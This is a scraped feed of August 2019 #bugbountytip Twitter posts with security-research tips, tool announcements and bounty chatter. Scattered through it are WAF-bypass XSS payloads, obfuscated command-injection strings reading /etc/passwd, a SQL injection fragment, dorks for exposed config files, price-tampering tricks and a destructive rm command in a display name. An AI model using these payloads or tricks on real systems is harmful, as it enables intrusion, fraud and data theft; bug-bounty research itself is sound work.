0 #redstorm swag #reward and #hof Happy to #secure #redstorm 😊 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter https://t.co/azpBgqAn21
3P1C
@_3P1C


2019-08-30 13:27:03
0 Bypass for SSRF filter Find a subdomain of your target (whitelisted) that resolves to an internal IP Like this internal[.]target[.]com --> 127.0.0.1 #bugbountytips #bugbountytip @intigriti @Bugcrowd @Hacker0x01
Fisher
@Regala_


2019-08-30 09:42:22
2 Yes!! Burp Scope Monitor just reached its 100th⭐️!! 🥳🥳 If you haven't used it yet, have a look at https://t.co/2zzgrNvj3G. Currently I'm especially looking for bugs/improvements suggestions so I can work on them later. #bugbounty #bugbountytip #infosec #pentest
Fady Othman
@Fady_Othman


2019-08-30 05:37:29
1 Do you think recording video tutorials using a 21:9 format (Wide Screen) is a good idea? #bugbounty #bugbountytips #bugbountytip
The_unstable
@chaskar_shubham


2019-08-29 13:03:23
0 I rewrote Recce from scratch! It is now more faster than previous version. It can now detect server. you can write output in csv file. https://t.co/CGFQHNaA64 check out! #bugbountytips #bugbountytip #bugbounty #InformationSecurity #infosec #infosecurity #hackerone #bugcrowd
Jagannath
@SecurityBoy0x01


2019-08-29 09:56:59
0 [Protip] Passwords using leetspeak are much safer than normal passwords against bruteforce-attacks with word--lists. E.g '53CURI7Y' is much secure than 'Security', when combined with password managers. #bugbountytip #Password #hacking
Cyberthereaper
@Cyberthereaper3


2019-08-28 22:59:14
0 The biggest obstacles that will prevent you in bug bounty programs. Ruby web page Json content-type Akamaighost Cloudfront Cloudflare #BugBounty #hackerone #bugcrowd #intigriti #infosec #bugbountytip
Julien Ahrens
@MrTuxracer


2019-08-28 18:23:55
1 I recently got a maximum bounty for: Reflected XSS -> Grabbed user's identity token (no auth) -> Found auth logic error that converted the token w/o the user's pwd into an auth token -> ATO & 2FA Bypass. Always maximize your impact! #togetherwehitharder #bugbountytip #BugBounty
Yadhavi
@PrincessYadhavi


2019-08-28 16:42:39
0 How much rate you will use to get best results from masscan? (1024 hosts, 5$ digitalocean vps) #bugbounty #bugbountyhelp #bugbountytip #bugbountytips #masscan
Random Robbie
@Random_Robbie


2019-08-28 10:32:27
3 #bugbountytip BUGROBBIE for discount on @binaryedgeio
Cache Bounty @127.0.0.1
@Cache_Bounty


2019-08-28 09:06:40
1 Old but very useful: https://t.co/j1GHbfHNsc #security #bugbountytip #bugbountytips
Michael Eder
@michael_eder_


2019-08-28 08:33:10
1 Authenticated dirbusting 1) Log in w/ Firefox>DevTools>Network>reload page 2) Right click request, "copy curl" 3) rustbuster <your regular rustbuster options> <all -H parameters of the curl command> 4) Profit #infosec #bugbountytip #pentest
kaustubh padwad
@s3curityb3ast


2019-08-28 08:13:39
1 Ever Happen'd this @Hacker0x01 with known guys.. @sagarparmar121 @niksthehacker @stokfredrik @fransrosen @emgeekboy @Parth_Malhotra #bugbountytip #bugbounty @gwendallecoguic #hackerone #bugcrowd @SynackRedTeam is exception for this sharp 24Hrs payout.. ;) Just for Fun #bontyfun https://t.co/wyuV36SLWt
Nihad
@nihad_rekany


2019-08-28 08:09:48
0 Feeling love 🥰🥰 @fbsecurity #bugbountytip #bug https://t.co/Pc9V8CSJuu
Nihad
@nihad_rekany


2019-08-28 08:08:24
0 Thank you @fbsecurity 🥰🥰🥰 #bugbountytip https://t.co/jnggbyDNx8
Neeraj Edwards
@neeraj_sonaniya


2019-08-28 05:29:04
2 Revealing AWS S3 bucket name: step 1: Find any CDN object URL step 2: append following string to after URL: `?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&Expires=1766972005&Signature=ccc ` and boom it will reveal the bucket name. #BugBounty #security #bugbountytip #bugbountytips https://t.co/JWqGuZLHW4
Ahmed Lekssays
@Lekssays


2019-08-27 22:51:16
0 I made a tool to Extract Open Kibana Instances on Internet and Map them to their Corresponding Organizations using SSL certificates for Bug Bounty Programs. You can check it out: https://t.co/IQQIKdaAaC Happy hunting ;) #bugbounty #bugbountytip
Radek
@radekk


2019-08-27 19:45:52
1 Read how to use Burp Suite with multiple Firefox profiles - https://t.co/xqRPeT8NfC #bugbountytip #bugbounty
Aussan 🇨🇦
@aussan_m


2019-08-27 18:15:36
1 #bugbounty #bugbountytip When you get a bounty try to remember that there are people in need out there...try to give to charities, ... helping companies become secure is great, but helping others is even better.... remember what goes around comes around....
kaustubh padwad
@s3curityb3ast


2019-08-27 16:31:02
0 If you could ever build such complex query and if it returned 404 in "boolean based blind sql injection" AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x21) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x70686f746f73. what will be your reaction... #bugbountytip #ctf
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-27 00:31:48
3 CloudFlare {"HTML TO XSS"}; ~byPass Detected. 📡 [" <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> "] #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-26 23:48:19
0 CloudFlare {"XSS"}; ~byPass Detected. 📡 <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-26 21:52:05
0 I think one of the pages you hate to open the xss alert box is that it uses the ruby ​​software language. #bugbounty #bugbountytip #hackerone #bugcrowd #infosec #redteam #xss #hacking
Murdockz
@Murdockz_CEH


2019-08-26 17:36:42
0 Created my first "Real" python script that decodes any base64 string...I think lol. Don't judge me it's my first time learning python lol. Check it out. #bugbountytip #bugbountytips #bugbounty https://t.co/rSnsf6BoBb
kaustubh padwad
@s3curityb3ast


2019-08-26 17:19:32
0 This is how I learn SQL Injection Now a days... #rofl #ctf #SQL #injection #bugbountytip #wireshark #hackerone #AppSec but I can imagine how tough is this to exploit, since sqlmap is taking too much time now its 2+ Hours with --dump-all... :) https://t.co/t1G0qtaNQh
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-26 16:50:20
0 Regexp trying detect Open redirect in response for burp #bugbountytips #bugbountytip https://t.co/LTbegfJf77
Murdockz
@Murdockz_CEH


2019-08-26 09:48:23
1 My first bug crowd P1. API Keys, Firebase Tokens, Account username and password. Recon wins. #BugBounty #bugbountytip #bugbountytip https://t.co/K6C0mnajQH
Hussein Daher
@HusseiN98D


2019-08-25 14:31:51
10 As per the vote results, here you go! A cool XXE resulting from a SSRF found on local company website during a pentest. DMs are open, retweet and like if you love this style of PoC! 😎 #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/XbwBLdYO33
gautam bhatia
@gautambhatia57


2019-08-25 11:14:23
0 Thanks a lot @defcon @DCG91135 @Bugcrowd @lab401 @infosecgirls @hackthebox_eu @PortSwigger for amazing workshop at DIT University #infosec #security #reversing #bugbountytip #rfid https://t.co/wqtmwLM4y9
Arif Khan
@payloadartist


2019-08-24 14:17:36
2 Another awesome research by a god of websec @filedescriptor: The Cookie monster in your browsers https://t.co/x051kiyWgJ #BugBounty #BugBountyTip
Hussein Daher
@HusseiN98D


2019-08-24 13:52:55
1 My next #bugbountytip PoC (check my Twitter for a preview of the old ones) should talk about: #bugbounty
Yogendra Jaiswal
@vulnh0lic


2019-08-24 13:28:31
17 Just Published article of [iOS Application Security] Jailbreak 12.4 and SSL pinning bypass | How to set up your iOS Testing Lab https://t.co/kVAs20V8dC #infosec #bugbountytip #sslbypass #jailbreak #iOS124 #unc0ver Thanks, @prateek_0490 and @Yassineaboukir @jpjaypatel34
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-24 11:25:33
1 Time US : 10:00 Time ID : 21:00 Bug Bounty Live! basic #recon , VulnerabilityAnalysis #shodan Live at : https://t.co/QdsrDoweOQ Follow Live streams and share... #BugBounty #bugbountytips #bugbountytip #hackerone #bugcrowd
Raihan Biswas 🇨🇮
@zapstiko


2019-08-24 05:01:29
3 Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Vitthal Shinde
@0_1VitthalS


2019-08-24 04:11:48
1 If you found a hardcoded slack token, you can use it to get invitation to slack group. https://t.co/OMxs8QFVjQ<slack_token>&channel=CL0KQ4SK1&user=<email>&pretty=1 #BugBountyTip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-23 06:41:14
1 Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Uranium238
@uraniumhacker


2019-08-22 18:02:56
1 Have your tools exporting stuff as JSON? use Panda to export it as a .db file. You can then use client side js to parse the db and query through it. #bugbountytip
contra_security
@security_contra


2019-08-22 17:46:16
0 Analysis of Ruby rest-client 1.6.13 backdoor https://t.co/KGSXYpw68B @snyksec #owasp #backdoor #ruby #appsec #bugbountytip
m0z
@LooseSecurity


2019-08-22 16:47:55
6 file.php?url=/admin/ Redirects to: https://t.co/xsJrSUcfgM Put URL [email protected] Now it is [email protected] which redirects to https://t.co/ptXaIXLfKk! #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity
Prateek Tiwari
@prateek_0490


2019-08-22 15:47:03
4 Really shocking to see how companies leave their log instances exposed to public. I'm referring to #Kibana, since last few weeks have found a lot of them, reported to companies who have BBP's. Dork - inurl:app/kibana Shodan - title:"kibana" port:"443" #bugbountytip #bugbounty
sudoka
@sudo_sudoka


2019-08-22 10:57:15
0 I've seen some websites block exactly the string "alert(something)" #xss #bypass #bugbountytip https://t.co/MKOSMHdKcA
Dhamu
@Dhamuharker


2019-08-22 09:11:57
2 #bugbountytips #BugBounty Finally Got it Root Access. Thanks for @orange_8361 @ProjectZeroIN the exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510) https://t.co/k1Qk45QnCq #bugbountytip #ItTakesACrowd #TogetherWeHitHarder https://t.co/lwJi2ss068
Anton Korzhynskyi
@page_1337


2019-08-21 21:42:14
0 My turn :) Cloudflare #XSS #Bypass <img src onerror=%26emsp;prompt`${document.domain}`> #WAF #BugBounty #BugBountyTip https://t.co/UxkKOfkioC
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-21 19:54:51
1 ModSecurity {" XSS "} ~Bypass braindeath; ⓾ ~1; " %3Cspyerror%20script%20goes%20here%3E=%0AByPass " ~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E" #BugBounty #BugBountyTip #WAF #infosec
CaptainFreak
@0xCaptainFreak


2019-08-21 12:09:46
0 On Rails target, many people don't try XSS tests by knowing that Rails by default doesn't reflect without escape/encode. But "security concious" devs mistake the "html_safe" method of rails for escaping while it does the exact reverse thing. Hence, XSS lives on. #bugbountytip
Abugzlife
@abugzlife1


2019-08-21 01:39:35
5 Have you ever thought to yourself: “You know what, I’m really curious what the methodology for finding bugs that an average bug hunter who focuses on depth rather breath looks like!” Well, now is your chance to see! https://t.co/ih8hwmaIP6 #bugbountytip #bugbounty
plenum 🇹🇳
@plenumlab


2019-08-20 23:21:47
1 To those who struggle to get into bb I barely knew what http requests look like, 14 duplicates and 4 N/A before my first valid report, don't quit, every minute, every inspected http request is experience #bugbountytips #bugbountytip
Ammar Amer
@cry__pto


2019-08-20 23:15:45
1 i think you should visite my repository ,you may find something useful about hacking & pentesting & cybersecurity & redteam & malware. almost 2000 link & almost 1000 article as pdf files. enjoy and #happy_hacking https://t.co/q2layzVpKz #sharingiscaring #bugbountytip #OSINT https://t.co/DWQFvHpWuN
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-20 19:03:48
0 yay I found Jira Dashboard at @Hacker0x01 #DOD Exploiting Jira Dashboard Leads to (RCE) This report waiting a Disclosed / Fixed and waiting for #writeups #BugBounty #bugbountytip #rce #jira_rce https://t.co/T0M5Zr8q2B
Rishabh
@____cypher____


2019-08-20 18:35:23
0 Did you know you can "edit and resend" requests without any interceptor in Mozilla firefox #bugbountytip #BugBounty https://t.co/FrtUB2KUO8
Raihan Biswas 🇨🇮
@zapstiko


2019-08-20 15:08:22
4 {XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// #BugBounty #BugBountyTip #WAF #infosec
Faizal Abroni
@faizalabroni


2019-08-20 13:58:44
0 AWS Metadata Disclosure via hardoced host download (indonesian language) https://t.co/lkxDPZ8VN8 #bugbounty #bugbountytip #bugbountytips #togetherwehit #ittakesacrowd
C1h2e1
@C1h2e11


2019-08-20 13:34:45
2 A tips from Nahamsec @NahamSec curl -X GET https://t.co/pIuaaFEPZL{organization} https://t.co/5XaiHYznhj{organization} https://t.co/7AlvIjzWht{IP address} Shodan search query ASN:{ASN} #bugbountytip #bugbountytips https://t.co/RGdbP6rj4u
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-20 13:08:57
3 {XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// #BugBounty #BugBountyTip #WAF #infosec
Securisec 🚀
@securisec


2019-08-20 11:34:28
0 "RT RT Regala_: Here it is! Burp Scope Monitor, a simple Burp_Suite extension to help you keep track of unique endpoints in your history, marking them as analyzed, highlighting and other cool stuff! Check it out: https://t.co/EFXtxmOLEE #bugbounty #bugbountytip 🥳🥳😇"
Cyberthereaper
@Cyberthereaper3


2019-08-20 10:54:47
0 sometimes we cannot find vulnerabilities due to a web browser problem. #hackerone #bugcrowd #infosec #bugbounty #bugbountytip #blackhat #defcon #redteam #LFI #RFI #hacking #chrome #firefox #recon #osint example : https://t.co/D0RK0uDcB2
Sergey Kashatov
@iframe0x01


2019-08-20 10:25:10
1 #hackerone #bugbounty #bugbountytip I just published How I upgraded my privileges to the administrator of Odnoklassniki’s url shortener https://t.co/yBKYctUp0a
Fisher
@Regala_


2019-08-20 09:20:01
14 Here it is! Burp Scope Monitor, a simple @Burp_Suite extension to help you keep track of unique endpoints in your history, marking them as analyzed, highlighting and other cool stuff! Check it out: https://t.co/2zzgrNvj3G #bugbounty #bugbountytip 🥳🥳😇
luffydragneel
@Hackers_Guild


2019-08-20 06:53:26
0 If there is a subscription for a pro account for suppose 1 year, always Intercept the Request and change the subscription period. In some cases, you will be able to increase the subscription to any no. of years leading to Business logic vuln. #bugbountytip @SynackRedTeam https://t.co/NLDXDbquzY
Osama Avvan
@osamaavvan


2019-08-19 18:07:09
1 My Writeup about Different Ways of Exploiting CSRF. https://t.co/yneogH4EYL #bugbountytip @bugbountypocs
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-19 16:40:35
0 { WAF }; bypass post based xss ✨ ~Payload; <message><dialogueType>&e;</dialogueType></message> ~Result; WAF Allowed: 200 #BugBounty #BugBountyTip #WAF #infosec https://t.co/f28Yby7WZR
Soroush Dalili
@irsdl


2019-08-19 11:33:43
0 #BugBountyTip: To make your Burp Suite testing faster, change its colour to Red! With go faster stripes as suggested by @bao7uo
Proxy
@LinuxKodachi


2019-08-19 11:27:51
0 🛡 Honest advice, Sherlock! 🛡 #bugbountytip #mentor #entrepreneur #Developer #programming #programmers #startup https://t.co/0I8cofTS3X
ak1t4 🇦🇷
@akita_zen


2019-08-19 06:38:08
2 #Bugbountytip: avoid to define yourself for what you know or what you have or what you get ($$$). You are truly unique and your being can’t be defined by a temporal status. Enjoy bugbounty, play a little, bb needs to be fun :) #bugbounty #infosec #mentalhealth
Cyberthereaper
@Cyberthereaper3


2019-08-19 06:33:41
4 S3 bucket finder cat subdomain.txt | httprobe | tee hosts && meg -d 1000 -v / && grep -horiE [A-z0-9.-]+\.s3\.amazonaws\.com (You can change regex or you can add more regex with && ) @TomNomNom #hackerone #bugcrowd #recon #infosec #blackhat #bugbounty #bugbountytip #osint #s3
mr_nyx
@mr_nyxs


2019-08-18 19:11:24
1 Never give up! Payload URLENCODE(payload) URLENCODE(URLENCODE(payload)) URLENCODE(URLENCODE(URLENCODE(payload))) ... #BugBountyTip #BugBounty
HackIsOn ®
@hackison


2019-08-18 17:33:00
0 What will be your answer to the following question #infosec people? 🤔 How to #hack android phones using Link ? 😂 #hacking #pentesting #linux #bugbounty #bugbountytip #exploit #kalilinux #offsec #redteam #pentester #hackison #wapt #vapt
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 17:12:44
2 Hi babe again I'm, whats up fbi. I warned very , lest he remove the search button from there. 💣 Patch: https://t.co/NhIAxHWUUl #BugBounty #BugBountyTip #WAF #infosec https://t.co/azwQwX5nMh
YS
@YShahinzadeh


2019-08-18 16:45:08
0 JSONP call returning auth token -> acc takeover #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-08-18 15:42:00
0 Don't expect different assets/endpoints if you are searching in the same subdomain. #bugbountytip #BugBounty #WebPentest #SearchSomethingElse
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 14:21:24
5 "Cloudflare"; live payloads: 🧠 ~1: <img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'> ~2: <img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//"" src="x" alt="showme"> #BugBounty #BugBountyTip #WAF
NetDevilz
@netdevilz


2019-08-18 13:03:14
0 Time may have forgotten everything, never date ... #netdevilz İCANN: https://t.co/FZafbc6qaj #bugbounty #webapp #bugbountytip #infosec #waf https://t.co/sYW3KKhdSo
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 08:43:13
1 Sucuri { RCE }; payloads, dot shot. 🌪️ Smuggling RCE Payloads: </> /???/??t+/???/??ss?? </> Obfuscating RCE Payloads: </> ;+cat+/e'tc/pass'wd </> </> c\\a\\t+/et\\c/pas\\swd </> #BugBounty #BugBountyTip #WAF #infosec
Str0k1rch
@str0k1rch


2019-08-18 08:32:02
1 Do you guys stop trying for XSS When Cloudflare is used? If not, got any tips? :) #bugbountytip #bugbounty #infosec
Murdockz
@Murdockz_CEH


2019-08-18 02:47:26
1 Guys if you're looking for a way to host a Kali Linux instance in the cloud check out this tutorial on creating your own Kali Linux cloud VM with DigitalOcean https://t.co/xnP1cfd8lZ. I highly recommend. https://t.co/0TpWOKInke #bugbountytips #bugbountytip #bugbounty
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-17 20:41:53
4 ModSecurity { RCE } Detection Bypass 💥 { 1 }; ;+$u+cat+/etc$u/passwd$u { 2 }; ;+$u+cat+/etc$u/passwd+\# #BugBounty #BugBountyTip #WAF #infosec
John
@JohnH4X00R


2019-08-17 18:23:03
2 "Rather than scanning for vulnerabilities, we need to scan for interesting behaviours"... Excellent advise by @albinowax from an old gem, must read... https://t.co/9FPy2OnCBM #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-17 18:22:39
2 Bug Bounty Tip : Target Android Mobile Apps to get the Endpoints/Hostnames and Run PortScan -- #BugBounty #BugBountyTip #hackdoor
C1h2e1
@C1h2e11


2019-08-17 13:41:05
1 #BugBounty #bugbountytip Try to scan these sensitive files or add a header for a quick vulnerability scan https://t.co/ZuZ5xMEqmj
Ammar Amer
@cry__pto


2019-08-17 03:29:40
2 the most tow free important resource on the net to learn how to detect & exploit open-redirect & evade WAFs.if you are serious about learning thise vulnerability you should visite thise sites. https://t.co/IgbCjfguvb https://t.co/dGFkRiy43A https://t.co/1R23RdPEDN #bugbountytip
Soroush Dalili
@irsdl


2019-08-16 21:46:24
3 After spending so much time, finally here it is: "𝗨𝗽𝗹𝗼𝗮𝗱𝗶𝗻𝗴 𝘄𝗲𝗯.𝗰𝗼𝗻𝗳𝗶𝗴 𝗳𝗼𝗿 𝗙𝘂𝗻 𝗮𝗻𝗱 𝗣𝗿𝗼𝗳𝗶𝘁 𝟮" https://t.co/L2XrRRfqU6 #appsec #FileUpload #pentest #bugbountytip https://t.co/O3jVp0TWVq
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-16 21:18:20
0 #burp, #bugbountytip,#bugbountytips Recon with BurpSuite. Only burp no extender. I like this way. https://t.co/siOc5UaDLf
SALTWRX
@SaltwrxLLC


2019-08-16 17:14:00
1 @AFSLabs For those looking to setup a droplet for doing reconnaissance. #bugbountytip
HackIsOn ®
@hackison


2019-08-16 14:45:08
0 [Sensitive Directories] intitle:"Index of" wp-config.php [Sensitive Directories] intitle:index.of./.sql [Pages Containing Login Portals] site:*/cgi-bin/login.html [Various Online Devices] inurl:ftp://ftp robots.txt #dorks #hacking #bugbountytip #bugbountytips #pentesting
Milind Purswani
@MilindPurswani


2019-08-16 14:28:52
0 Have been testing for SSRF bypass for more than 2 hours on 1 endpoint -> Read the policy -> turns out, the endpoint is OOS. "Read the docs man! Read the docs!" 😑😑 #bugbountytip
OWASP Amass
@owaspamass


2019-08-16 14:23:16
0 OWASP Amass Fact: If you use the '-include' flag to reduce sources during your enum, be sure to include one or more of the following for ASN info: networksdb, radb, robtex, shadowserver, teamcymru and/or umbrella #osint #recon #bugbounty #bugbountytip https://t.co/QWTftRbJKT
expl0itc0der
@vanshitmalhotra


2019-08-16 14:04:28
1 Bug Bounty Tips - Always Read The Source Code //<>// #BugBounty #BugBountyTip
vj0shii
@vj0shii


2019-08-16 12:30:00
0 Best laptop for Penetration Testing and Bug Bounty Hunting @Apple @Dell @ASUS_ROG #bugbountytip #Pentesting
Detectify
@detectify


2019-08-16 11:00:10
0 Improving WordPress plugin security from both attack and defense side. Guest blog by @padannewitz. #detectifycrowdsource #bugbountytip https://t.co/627leeeH6R
abdoul gadiri balde
@moodiAbdoul


2019-08-16 10:26:29
1 #bugbounty #bugbountytips #bugbountytip never think that you can find nothing , i hacked a company that have top hacker in 00:51:31 #togetherwehitharder
Fisher
@Regala_


2019-08-16 07:32:13
0 Beta testing for Scope Monitor has started 🥳🥳 #bugbounty #bugbountytip https://t.co/KREdPY8rJT

@saurinn_


2019-08-16 01:40:12
0 Anyone have a link for a tool to test for different kinds of tokens (Docker specially)? It has a GitHub repo #bugbountytip #bugbountytips #infosec
Mo'men Basel
@Momenbassel


2019-08-15 22:40:44
0 HTTP request headers can be a golden gem for finding vulnerabilities never miss tampering/adding these headers! https://t.co/SdDV656qa7 #BugBounty #bugbountytip #bugbountytips
Hussein Daher
@HusseiN98D


2019-08-15 22:05:06
7 A 2 year old RCE on a @Hacker0x01 program. Next post at 400 RT! ALSO: I'm interested in any security research team / pentest work (remote). If any company/team is interested about my services DM me :) #bugbounty #bugbountytips #bugbountytip #infosec https://t.co/S1BpVB2LWM
Spicy
@BlackSheepSpicy


2019-08-15 21:31:56
0 #bugbountytip brought this up in @thecybermentor 's stream chat last night but you can load line separated text files into burp suite's scope so you can literally paste sublist3r's output into a text file and chuck the entire scope into burp with just a few clicks #BugBounty
Daher Mohamed
@DaherMohamed4


2019-08-15 20:14:51
0 #BugBountyTip #BBTip If you have win10 and don't want/can't install linux, you can use this tut to have linux/ubuntu terminal on windows : https://t.co/ftDEbdjv8U Must have win10 64 bits
m0z
@LooseSecurity


2019-08-15 14:44:56
1 A lot of programmers seem to forget that POST parameters pose the exact same risks as GET parameters. POST-Based XSS POST-Based CSRF You can even get SQL Injection through POST parameters. It's obvious but some people only check GET parameters out of convenience. #bugbountytip
MRunal
@mrunal110


2019-08-15 10:10:41
4 I just published What is Server-Side Request Forgery (SSRF) and some proof of concept about SSRF. https://t.co/uaTPqB470R #bugs #bugbountytip #infosecurity #cybersecurity #responsibledisclosure #vulnerabilities
Alex Chapman
@ajxchapman


2019-08-15 08:45:26
1 When you get RCE/ Command Injection on a server, check the system uptime. This can reveal the (ab)use of containers and help clarify technical risk #bugbountytip learned from @erbbysam at #h1702
Hendrik
@hendrikvb


2019-08-14 21:29:12
0 #CSRF lesson of the day: IE11 does not properly handle #CORS checks on file URIs! #bugbountytip #vuln #infosec
lavernasec
@lavernasec


2019-08-14 14:38:00
0 Pwn an iPhone to bank $1m and Check Point gripes about WhatsApp privacy again https://t.co/fBUkEesuVv #bugbountytip #iphone #whatsapptips #privacy
{{ '127.0.0.1’}}
@shivam31200


2019-08-14 08:45:53
0 So testing e commerce websites always check cms I found one of e commerce website is using magento I run as magento scan and found critical paths #bugbounty #bugbountytip Noob https://t.co/BBBPNECcrw
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-14 00:19:08
2 </>Cloudflare skip filters, ~XSS Bypass via dot. <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X #WAF #BugBounty #BugBountyTip #infosec
HackIsOn ®
@hackison


2019-08-13 20:17:42
2 Here is a video about the complete step by step installation procedure of latest #nmap 7.80. #hacking #kalilinux #linux #bugbountytip #bugbounty #penetrationtesting #pentesting #windows #redteam 🔴 LINK: https://t.co/8FTl0sOOgT
Vail
@Vail_302


2019-08-13 19:41:01
0 I am still new to #bugbounty , however, if this can help anyone else, I built a cherrytree template to help with organization of targets. Any tips on making it better, let me know. #bugbountytip https://t.co/Ew4mIgsFiu
MRunal
@mrunal110


2019-08-13 18:35:46
0 I Published open-redirect-vulnerability blog https://t.co/tZezs6hMUN #bugs #bugbountytip #infosecurity #cybersecurity
ADM|N|STRAT0R
@strat0r


2019-08-13 17:54:39
0 You can use https://t.co/5wzwWvgY36 or google cache to peek at the landing page for public GitHub repos that have been taken offline ;) #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-13 16:14:40
1 Amazon EBS snapshots exposed publicly leaking sensitive data in hundreds of thousands, security analyst reveals at DefCon 27 #BugBounty #BugBountyTip #devops #devsecops #penetrationtesting #pentesting #aws #cloud #security #cloudsecurity https://t.co/E0M5006vhc
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-13 12:52:25
0 Bug bounty is a project designed to stop hackers and to learn the techniques and methods of hackers. { fucking mercenaries }; #BugBounty #BugBountyTip #WAF #infosec
Fisher
@Regala_


2019-08-13 08:54:07
1 Bounty hunters: how do you organize your notes on targets, especially when switching targets back and forth and doing it for a long time? A thread 👇👇👇 #bugbounty #bugbountytip
GarimaShares
@GarimaBhaskar


2019-08-13 06:50:02
0 Apple is Offering a Bug Bounty of $1 Million If You Can Hack An iPhone https://t.co/nea8djOCnK #Apple #appledaily #applenews #AppleEvent #bugbountytip #MiLLiONS #technews #technologynews #hacking #Hackers #TechTrends #bloggerstribe #blogger #blogpost #garimashares #iOS #macOS https://t.co/Lk3P2YJyt8
mr_nyx
@mr_nyxs


2019-08-12 21:33:27
0 If you have a shop system or any other buying system, you should try intercepting both requests and responses and change the prices in both of them, you might find yourself paying only $5 instead of $1000 #BugBountyTip #BugBounty #parameter_tampering
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-12 20:09:34
0 109 Payloads {URL} for #Hackerone_Programs #DOD #Private_Programs #Public_Programs #bugbounty #recon #bugbountytip https://t.co/e8Tm8nwz2B
Mufeed VH
@mufeedvh


2019-08-12 16:52:00
1 sector:443 CTF Walkthrough: https://t.co/0BWhT2HYFj #ctf #capturetheflag #bugbounty #bugbountytip #bugbountytips
lavernasec
@lavernasec


2019-08-12 14:38:00
0 Apple will now pay hackers up to $1 million for reporting vulnerabilities https://t.co/kYH14KVkB9 #bugbountytip #Apple #vulnerabilities
Ammar Amer
@cry__pto


2019-08-12 12:01:33
2 OPEN REDIRECTS is a dangerous web application vulnerability that should not be ignored by the security team/bug bounty hunters. thise vunerability may lead to installing malware/phishing attacks. and at least the loss of the reputation and clients. #bugbountytip
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-12 11:38:33
0 #Verizon - CORS Vulnerable Lead's to Information Disclousure (Criticals Impact) #BugBounty #BugBountyTip #CORS https://t.co/zDzL0gjDK9
Wladimir Palant
@WPalant


2019-08-12 09:06:09
2 I tried producing some useful instructions for less experienced people to recognize flaws in password managers. Let me know whether it worked! #infosec #crypto #passwords #bugbounty #bugbountytip https://t.co/WTm5SDpTi9
Ameen
@ameenmaali


2019-08-12 06:48:12
3 #bugbountytip: Duplicating params, headers, etc can be useful for bypasses. i.e., file upload filters can potentially be bypassed by setting Content-Type twice (once for unallowed type and once for allowed). Authorization protection could be bypassed w/ the same method #bugbounty
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-10 15:55:30
1 Finding was closed, no return. @YoncuBilisim #WAF #BugBounty #BugBountyTip #infosec https://t.co/eoVvedJriy
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-10 15:52:25
0 { Cloudflare }; ~ XSS Bypass: 🦍 </Scrpt/"%27--!>%20<Scrpt>%20confirm(1)%20</Scrpt> #BugBounty #WAF #BugBountyTip #infosec
[email protected]:~$ sud¤ rm -r /*
@IAMPROPERSAM


2019-08-10 12:15:05
0 I nd so many others out there definitely needs this... Thanks man. #bugbountytip #bugbountytips https://t.co/wUNiL9k1t7
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-10 06:05:19
